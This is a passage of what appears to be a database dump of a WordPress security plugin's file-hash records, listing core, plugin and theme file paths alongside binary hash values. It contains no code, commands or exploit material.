o���`+5p�Q\'+�eC���','',0,'?'),('���=֬H�@-i��','wp-includes/css/admin-bar-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�	u��\Z);�T�D%','˲\09�\\�k.�IkX��T��6� dÌ���+s�','',0,'?'),('��p����6�ɨ��ZL','wp-includes/blocks/widget-group/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`#��#��	���9�','��찁�+7!��^�a(Nlq�EÊ�Os�!Φ�','',0,'?'),('�֔��ߚy(qD�w�','wp-content/plugins/wordfence/models/common/wfGeoIP2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�YJs@j���r�jtm','�3ÑѲs��\r&�z=���ds��pJx�3�w','',0,'?'),('��(B�A!��������','wp-includes/theme-templates.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ȯ��\Z���f��','���Q)HשT2���\'�@�L+�\r�*�[�','',0,'?'),('��-\'f�ߕ?X:4\r!','wp-includes/blocks/table/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�U<�5��Etn��','���t���	Ud�]T�i\"���Uo)j�ʂF�','',0,'?'),('��h�L���JH�X#0','wp-content/plugins/wordfence/lib/wfUnlockMsg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�c)��Re�Y�l�7��','.�`�i�W�	t1�}�sty�ɪ���!K','',0,'?'),('��d.�\Z���\n��\r','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/lt.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ׄg��*3�\0��M��','�����֪v ,�q��t�\r��8;gH\0�shyne','',0,'?'),('���^��\'�q���0��','wp-links-opml.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','txB�ܥ�0��4ӄ?','�Rysx�L9���5\"�CZ�̜��95�� ;�','',0,'?'),('�%n��Tߒ	^�gXΰ','wp-admin/js/inline-edit-post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','囖�«��m��ץ�E�','&e�K(�����WΑ�0R)�a�ؤ�,rO�46','',0,'?'),('�3��aD�w�P����q','wp-admin/includes/class-theme-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r��Ө!�2S����','PE§���?/����9-Nb/�<�J�s��t','',0,'?'),('�6�Z��Ub2:����','wp-includes/js/dist/style-engine.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��P��۩*���P3��','���H�ȄB��|�F��\'���>r{�(яJL','',0,'?'),('�6��uQ[��6�̜l��','wp-content/plugins/wordpress-seo/src/wrappers/wp-rewrite-wrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�„d�I;r�~~U','��$������sU�%;|�^[�	��y8','',0,'?'),('�C݆w�\r��f� �\\�','wp-content/plugins/wp-cerber/languages/wp-cerber-sr_RS.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rD���.֡h�-�','`�A�\"��f�*�B2$e �Vr�̜��3��','',0,'?'),('�L(,�.����ZP/:�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�͞4�$�T���w�','K��uBi!�K�V�\0zW���=U�B 2�','',0,'?'),('�N�-�Y�)��~.�n','wp-content/plugins/wordpress-seo/src/deprecated/admin/class-social-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�N��]�;R�W���','�_C=��.\'�2��\'����&-�XȢ,�k*���','',0,'?'),('�XPwy�����\'�','wp-includes/blocks/navigation/view-modal.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\yٽ<V�4g','��w$��\r�G��W[r�X�<���{\'','',0,'?'),('�g�V�Sf���Rx','wp-content/plugins/wordpress-seo/js/dist/analysis-worker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�:��8BX�-��@','Szy-n\0�6�>+�Ǝ�!��\\gM�=��hD','',0,'?'),('�m`��5\n+��7��','wp-includes/blocks/search/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]L*�P��)�^���m�','ζ�j��a-���%c)���7(��;���<�|�','',0,'?'),('�zU)��퇵�r���x','wp-content/plugins/wordpress-seo/admin/class-yoast-notifications.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� {�&S�\"�Ne�n','�5!Js5ҨL�ՠ������eb�yM��','',0,'?'),('�}\n�`B{0-�L5�m','wp-includes/wp-includes/js/jquery/ui/effect-puff.min.js',0,'�^��5�����t�','�^��5�����t�','`}��`�J)�$;��+�6K�C1R�&]C�i��','',0,'?'),('���E��c�+,����P','wp-includes/wp-includes/js/tinymce/plugins/paste/plugin.js',0,'�^���s׶�{��މ2','�^���s׶�{��މ2','�\Z�X8�c+�x�η����&Wg�`m�˴','',0,'?'),('����X�1�L�w��^','wp-content/plugins/wordpress-seo/src/presenters/title-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ଥ�Ld�a܀�@�O8','HƆX`�JF�?�2�W�%i2[��M���','',0,'?'),('��n&���n�!崬�','wp-admin/css/site-icon.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�ˁx�J��TG���','�+���W���V��3�(qF���r;�|^�@��','',0,'?'),('������­{�e','wp-includes/blocks/comments-title/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ǔ�����:�*r�','�{d�zA9K�fȔ�i��M�4ۦxx�[d�v��`','',0,'?'),('����Yh� �����	�','wp-content/plugins/wordpress-seo/src/helpers/user-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','—���;�6��U.K�','đ-�����\0xB�1C�+D�O��ɭ��%�H�?3','',0,'?'),('��{���{8B%@\0�x�','wp-includes/blocks/post-featured-image/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j���a\n���=o[U%��','�j\'Kt̨������mQi�M�����An�-� \r�','',0,'?'),('��&��-w���.˚��','wp-includes/wp-includes/css/dist/block-editor/style-rtl.css',0,'�뺆��	�#��y�k~','�뺆��	�#��y�k~','(���䚆�u$/�/��f��Ш�۬x��M','',0,'?'),('����EX���|T��','wp-includes/blocks/media-text/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ɴ����y�,���XS','�\'<X���*;}�����ڋ<_3Ak�[8b��','',0,'?'),('��fD�4r��s��','wp-content/plugins/wp-smushit/_src/js/modules/admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@?�vo3O���#:3','�K����%��1�y�aL�s��\\<�C��\'�f','',0,'?'),('���sY�Ou)��H_�]','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/lv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>;��PR<U��U','ޢ�=�t��̡�n	0e��[�_�Qʷx=�%�','',0,'?'),('��	�k-9eMԡR','wp-includes/wp-includes/sodium_compat/src/Core32/Int32.php',0,'��3��NM[�/�\r~H','��3��NM[�/�\r~H','�����r�W���Q@x[1� ���*o�9�$�','',0,'?'),('��]j�l�\'��/x5','wp-includes/js/wp-sanitize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:k���E�t6Q��','yΦV�� }ɛq����K>ۈP6��*��C\ns}','',0,'?'),('���W��{�\\,�Yu�','wp-includes/js/jquery/ui/effect-explode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C�‹J��xq��O','+�!W�@y��\0R{)�i�v��\nS�z3;�','',0,'?'),('��!��4��r��]�','wp-content/plugins/wordpress-seo/wpml-config.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t0x1E�w�F&�@T','�\r^�X�\">H\\j�,YZ�\"\n�cä�\0�:2','',0,'?'),('��71���}\n��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�2+;�F���нNM��','�w��\"�*��5�U T@��nyȳ�^a�u��\'','',0,'?'),('��2.|�,�I`ӌ�xt�','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/NullLogger.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U{���HԀ�4p�(�','�&�t9�F\"�`a�t�f��G������l�f{','',0,'?'),('�\nr\'���AZ}��!�d�','wp-content/plugins/wordpress-seo/inc/class-wpseo-custom-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�F��5�y��,\Z�J-','���-��L����TBh+��&+�ck_M��ƅ','',0,'?'),('�,�{�vF��ߝ��','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z9գ��#����@�r��','K��uBi!�K�V�\0zW���=U�B 2�','',0,'?'),('�2X69G3�\Z�+}A�6','wp-content/plugins/wordfence/views/waf/option-whitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.������ #�v�}','�i���$��h�}�ws�������X��2�c','',0,'?'),('�5����\r��k��','wp-admin/js/color-picker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_����;\Z���5�','\n��m��m^�G&%�\0�SKm��Y2p����#','',0,'?'),('�8�������P5aĨ�	','wp-includes/images/smilies/icon_wink.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e?2���i����','�(���V��{�V�Bk����o(`Z��V	6','',0,'?'),('�<g�VA�!�z��','wp-content/themes/hitmag/inc/kirki/modules/webfonts/class-kirki-fonts-downloader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����`�qUd�y�_','�c-Ǣ��B��U���XЯk�k���^�B�E{�','',0,'?'),('�B�h\Z����n.]=','wp-includes/wp-includes/js/wp-custom-header.min.js',0,'KO��x �3��y;9�','KO��x �3��y;9�','��X$A���\r\"N��e�$ߦ��+���L(','',0,'?'),('�B�Pfn���a����','wp-content/plugins/wordpress-seo/src/helpers/short-link-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lVP֝4<5��Nm�$�','3����0��η�?y�-P��uS��S�b�','',0,'?'),('�_����?��ϣn:�E','wp-content/themes/hitmag/inc/kirki/controls/views/textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0\"��?#��n;�eA�',')�oa�5�KR9f2�cw�X�Vv5���Y���t','',0,'?'),('�ma\Z�9�+~�ȍ��q','wp-includes/wp-includes/random_compat/random.php',0,'�5&}k���!6�$�','�5&}k���!6�$�','X8�P���_9���kQ�a[��-mS\'<�@�!V:','',0,'?'),('�����y85���æb�','wp-admin/css/colors/sunrise/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','75 \Z��2�V��`z','����r�|nt�W����XM��f��8ӳܼ','',0,'?'),('��L��Ί�6�7m���','wp-content/plugins/wp-cerber/languages/wp-cerber-zh_CN.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.1۠�R���g{�tJ','�*�^��BiΔ�>C�����F]���3��','',0,'?'),('��d�^j�fBV��k�','wp-content/plugins/wordpress-seo/src/presenters/abstract-indexable-tag-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\\�M��h�','%���|�\'vJ��Z����CfW��5�=M|�=-�','',0,'?'),('�����wtz����	','wp-includes/blocks/term-description/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pp-���Y���Ur','r�ϲ_�^����<�b(PE.\r%i*xI�Zϛٮ','',0,'?'),('��l�3.	XN�','wp-includes/Requests/Exception/HTTP/403.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v���ڮ�V�3���','�I�l�E�K�Ѧ��?Z�0JT�����U�','',0,'?'),('��:\0ڥ�8~/�o','wp-content/plugins/wp-cerber/assets/flags/bl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}�	�!�]��y','��(��w�pg�*\n�p{\Z}[_�e��2�(˧�','',0,'?'),('��\"~I��E�\rD�@','wp-includes/wp-includes/js/plupload/plupload.js',0,'ݠ�$pZR�>\'�|�','ݠ�$pZR�>\'�|�','�\"����8[J%�.�˚�c�V\r\rE��)\'','',0,'?'),('���ݓ4�dҾ���T8','wp-content/plugins/wp-cerber/assets/flags/it.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ɔ�d�ܛ$e\r�05','���92x��Z����5ή�o1���^U)��','',0,'?'),('��N������^�J�W��','wp-content/plugins/wordpress-seo/src/models/seo-links.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&1��XJ$ߢ��/�l','\n�olq]Ti�R�_�΄������cw��u�*','',0,'?'),('���E��*��\'\0��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/pa.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(&�-MZl/鲑E�/�','b�:[F��*����t���	�B��â\n�','',0,'?'),('��<���)�\"���vY4','wp-includes/blocks/verse/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AX߁���`j�����','%_��ҷ74����w\'���G��&dr#��x�','',0,'?'),('���$��>P���3�V�','wp-includes/wp-includes/js/dist/a11y.min.js',0,'婯�S\Z�`�!`TLu','婯�S\Z�`�!`TLu','ʢ����Α%��d5F�(�VW��1�V|\"u99','',0,'?'),('����PQ�E|E}7+','wp-admin/includes/class-wp-filesystem-ftpsockets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Sѵ�����,�{1W','T�̶�ȯ\\��F�\r�z�-e���,�u2^','',0,'?'),('��E�q��v��','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/selectWoo.full.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�}4���$Ȁ?1�v','��2�.TX�P��~�\"A���LS�M/-','',0,'?'),('��U���$�\\*�1^�S�','wp-includes/js/jquery/ui/effect-clip.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4��*ȵ��MY+�','�٨����G���(䳴�HH�w�o�`�ph�?�','',0,'?'),('������ە��v�)�','wp-includes/wp-includes/js/dist/components.min.js',0,'�)��[Ŕ��^�2��','�)��[Ŕ��^�2��','��v�,�$.����b��߲���^�#n1�c�,','',0,'?'),('����P�J�t��1z','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��wU ��ې6M�\\�8','<����\0�\rIB=\"�P8D�\"�����L~�I[','',0,'?'),('����_�� �\0*�O','wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�tw�U|L����i{','�$��(�#Q1���B�j�ێ|󚨅j4D�D�','',0,'?'),('��B�3\r�qel�L�','wp-includes/blocks/query-no-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�e��*{/<�\'��','s6��1O���Q��Id��gP?�4�[z��B','',0,'?'),('��F�G���ݽ�\0�|0','wp-content/plugins/wordpress-seo/css/dist/workouts-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\k��w]&%�\'�','�\"I����^k��-�Y��q�wn��쫟�6\'	щ','',0,'?'),('��P\Z��/���l%�','wp-includes/js/jquery/jquery.hotkeys.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��hI�QLZA$Un�H�','��T����f�RMS�9º��MDR��R��N�','',0,'?'),('�\0� ��k~��U5T','wp-includes/widgets/class-wp-widget-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^lw����u�`�Ģ\r�^','��p�Y�:׫�߀Ӷ���w�4��d\n#^','',0,'?'),('��i�L�ƾ�<k��','wp-includes/wp-includes/images/smilies/rolleyes.png',0,' ���O�2�Ofݣi�',' ���O�2�Ofݣi�','fK�)�\n�d��!]\r)��\\}���זl�^��','',0,'?'),('�	J.�\'��Vn{�|�T�','wp-content/plugins/wp-cerber/assets/bgwidget.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PM6ev����3���','��F.�F��3��r5�e�*\rl��������3\r','',0,'?'),('�\n%f[!aE�r�tg�i','wp-includes/images/media/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����u�h����q��','DBU����MiO�b�,���e��=��W�{���','',0,'?'),('�\n��Cm�Q�Uܓq��','wp-content/plugins/wordpress-seo/src/builders/indexable-social-image-trait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�AО3�߳?ȥپ5�','���-f�#7�c�z�-�*��)�����r','',0,'?'),('��Ӡ_�Q?����#','wp-content/plugins/wordfence/images/logos/shield-response.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�\nو1:/(d%܅�','�\Z�jtY�aW=x!��[�4H!|�����','',0,'?'),('�χ���y2ř���','wp-content/plugins/wordpress-seo/js/dist/languages/pl.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\0\"+�-��D1','8��HcC:B�}�~<]x�^ꫵ� �s��','',0,'?'),('�%��CB�*��r��QP','wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Roman.otf.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�y\nY�n2�!��','ShV�Zt^�~͛���\n#$֒\r�5�V���','',0,'?'),('�&�S짿o�$�0�n','wp-includes/author-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>��q��ڦ��B','���l}�u���L�޽�܋8;�m]���c\n��','',0,'?'),('�?8Rm�ТE7h��<�','wp-includes/blocks/buttons/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ij���D?a#��','P5gz��u�U$i��t,�!��D�l��ò�]�','',0,'?'),('�A%��s8��a��ڣ��','wp-includes/wp-includes/js/comment-reply.js',0,'�F���D6����x�','�F���D6����x�','!�x��G�����Go�Df�B8xXC�','',0,'?'),('�G�|$p֠+(�','wp-admin/js/tags-box.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g4i�e��ڠ�Y,׃','u,�tsn��`�b�$�D�r�FRS��r�ґ�^\"','',0,'?'),('�Q����ԁ�2�7u�L','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1���3y����1��','	}��N�	<�v���B�S%�s\\���S�','',0,'?'),('�R��B�p��m�Z�;','wp-includes/css/dist/block-editor/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���@Ԍm�p���,','\\��r\ZA���/��%I�ʶ�(�u��7�V\0pe�','',0,'?'),('�UA�Q�,U���q���','wp-includes/blocks/pullquote/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�*Yb�_Hl��<Ovs','5sY�|;8)��lϓ���a�w�]��S˘ճ�t','',0,'?'),('�`��%\Zrv��K!�L�','wp-content/plugins/wp-fastest-cache/images/maxcdn.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�]�/c��u┽E','-G�Z��qI<O��q�\Z�Ѡ�2�����Hq','',0,'?'),('�r)F�ScS�I���2C','wp-content/plugins/wordpress-seo/images/mirrored_fit_bubble_woman_1_optim.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Æt�V��O��+�mF','��)-n����d��\\Go�Q�	3݁�}�2�','',0,'?'),('�o�j����y��V','wp-content/plugins/wordfence/lib/menu_tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9����V���>�1','����%���6�i���;K2P����>�}�','',0,'?'),('��Ca�s�]��n�/��','wp-includes/css/dist/block-library/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/_����j��<T','$\0��B8��4,�\";l�0�vO�)y$I��+','',0,'?'),('���Uv\\Ae�\rs����g','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/lt.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|QX�Pv��H��\0(','W��&g}0f�J�ى�HG=��d�W�V���CV��K','',0,'?'),('��Ѻ�\"�P5��^U�\Zi','wp-admin/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|Fً��M�Y#uͳ','[����;2;�2⻖�d�q~�z\Z��7ևH�W�','',0,'?'),('����h|�d7��k�Nn','wp-includes/wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php',0,'\"<8���.���K�\'','\"<8���.���K�\'',' \ZYӵ�˼*�,Q�L�Y{�㬣p�\r�h���','',0,'?'),('��m���z4�L��K','wp-admin/images/xit.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	3X�ī9+�6n~','�� s������ۨ��S,md�\\Yb�Ƈ��o','',0,'?'),('��wF��ȶ���# �','wp-content/plugins/wordfence/modules/login-security/views/manage/grace-period.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��o�}�$\Z�X�','��EʕG��!�ܷ�[�~r��:��\'O�','',0,'?'),('����A�G,��<���','wp-includes/js/jquery/ui/effect-fade.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v���Ml�E��_&','w��/�2-�*_��P����s�Q�Oi{a@','',0,'?'),('����8#i�j�g�m,�','wp-content/plugins/redirection/locale/redirection-en_CA.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʒ�zs(�SL@2v�M','����8<����Z�˝������8����sox','',0,'?'),('����3iϗ�°9�p<','wp-content/plugins/wp-smushit/app/views/dashboard/tools-meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@����� ^W\"���xY','��W������|���n��Q_\r��n�F�]j�','',0,'?'),('���tb���`s]\'','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider/AbstractProvider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gǐC�h�2/�,�','�cV?��;�.��ü�Ժ��v�a�ۡ1�`Y*C','',0,'?'),('��:\Z�`gI ��>P)','wp-includes/assets/script-loader-react-refresh-entry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T���9Q*%M��i~J�','����,�Z�H�^-��C*0AJ��D��4�&','',0,'?'),('��hZ<�5�}K˲�','wp-content/plugins/wordpress-seo/js/dist/select2/select2.full.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d&��pu��W��}�4\'�','!\"�~9��_F2&-�g���1=�����^��','',0,'?'),('���C�ez���q�x','wp-includes/wp-includes/css/admin-bar-rtl.css',0,'����r���ju','����r���ju',',t�c*	2�����3ئI����4�j','',0,'?'),('��6�Sqc��H��)','wp-includes/wp-includes/js/jquery/ui/selectable.min.js',0,'�ZIr��]-�4��','�ZIr��]-�4��','�]���+�R��s���z�lC�a���(8��','',0,'?'),('����ؙ�3���','wp-includes/wp-includes/js/masonry.min.js',0,';?�&��T�Je�xH',';?�&��T�Je�xH','$��!�|=#f�c�jc���:��T�Q0b�,ʉ�','',0,'?'),('�����հ	̋�Ȳ�S','wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q*ZZ�sq���A}p�','?L\0e}���z4�t,�N)^�Q����À۲','',0,'?'),('� �n�$��q��^qf��','wp-includes/images/smilies/icon_lol.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n����:ѷ&����(�','�l�1�Hq�.�2�x��󢾉$�Y�\Z8�','',0,'?'),('�$gJ����O��=�','wp-content/plugins/redirection/locale/redirection-lv.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`T<A*�z�!?��fS','ky\"ŇcƠ��/_�DV}\\�ے2�4_��l','',0,'?'),('�\'^�D��IG�1��!','wp-includes/ms-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ���>�*���X&��','/�#B�_,�LL��۬�\r�U}���P�l��f�','',0,'?'),('�(���Ϲ��ز���','wp-includes/blocks/video/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F>@�4��,�^�En�','�}�(�دq�Q��|�j��?���9�^�޴4?','',0,'?'),('�*T�u\r�����~�m','wp-admin/css/colors/ocean/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ӣ��?�.\\{�','#N,�.��Vc��ҹ1D���!?“4�dJ�Qtݨ','',0,'?'),('�1l<� t~L�Uw�','wp-includes/class-wp-locale.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^v���U�S�q ��','�ӈL��_W�D�{4���\'�]T7�\n���','',0,'?'),('�4\nR����c8_sVuA','wp-content/plugins/redirection/models/url/url.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m�\\\r�QD�*/��f1','���f���n��zG5Vf��	�O��v#�� _','',0,'?'),('�E-j��1j��\r�E�','wp-includes/registration-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q<۾\Z7�M�v��','Kd���_�MF� X��X�.,\'T\\��6���6','',0,'?'),('�Lu���w?���q9','wp-content/plugins/wordpress-seo/js/dist/bulk-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Jn�:4O)�\Z}۶','��?g\\�˘��\'U��*�W5��o:<��ٳ9�','',0,'?'),('�[���d�m{&oL!Τ','wp-includes/wp-includes/js/tinymce/plugins/textcolor/plugin.min.js',0,'��v�<h������p�','��v�<h������p�','!�/�[I�+\r��G���� Dխ�7�=�����\'','',0,'?'),('�]oM�se��J4�','wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o���h5��\rxܖN','6y\Zu�υ;�	�0�~�rs1J�9��X���J���','',0,'?'),('�`�h�sY%3d��d','wp-content/plugins/redirection/matches/language.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�d�з��d$�','���m\n\"֩�]��&���A\"y��Ԓ��n2�\"}','',0,'?'),('�f ��r�p�(��p�$�','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��bD�@p�G+��','*DZ�>�Bg�&Y�Y������4(<�/','',0,'?'),('�g�K�;�qF�VI}�Q�','wp-includes/Requests/Exception/HTTP/416.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HLt&לk$*A�i�ŷ','�(��mybV�aI�jWp���(!A����<(�X','',0,'?'),('�he��M]�BӱS�˜�','wp-content/plugins/redirection/models/fixer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	�~�2�9lm�A���','	W~k�S�����:7����),5�X�k(5c�','',0,'?'),('�j���vȋ=Q�b�̋','wp-content/plugins/wordfence/js/jquery.dataTables.min.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<\\�� �͕�h�','v�Ao;�uD�3$�WB95�_\"��� �','',0,'?'),('�|N�ݾfo��e4b`>�','wp-includes/wp-includes/js/jquery/jquery-migrate.min.js',0,'y��k~�x�$K^-3�}','y��k~�x�$K^-3�}','��P�y���D\\\\�cd�~��P���`7 �F/','',0,'?'),('���Nl0<+�ox','wp-content/plugins/wordpress-seo/src/generated/assets/plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����(;�]6�]+\'�','�{M�H6u��=oc�P�\ro������e��̰��','',0,'?'),('�������<�x�B�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%���\r���|�UZv�','��Z^L���a����~z�0;3e�,˒���-=','',0,'?'),('���4Gqh\"ݡ��j�O','wp-content/plugins/wordfence/css/iptraf.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�bf.��\n�V[�xPh','J��-@ ]�-��	�cq���WQ$8�','',0,'?'),('��e�-��Rȉ���L:�','wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�Z��O�;�m�#�','�v�̀��O��=��n��u�#�}��զ`�4�W�','',0,'?'),('���e��Xi����|$�','wp-content/plugins/wp-cerber/assets/flags/sl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yj>PiՇ����j{','1�\'o]n��D�!�n�>�\0|&R�hZ}�����u','',0,'?'),('���`��Is��^.A','wp-includes/wp-includes/images/media/spreadsheet.png',0,'�4���\0T��̇?�','�4���\0T��̇?�','����v��)�\n�6Zl��2���В1�!+	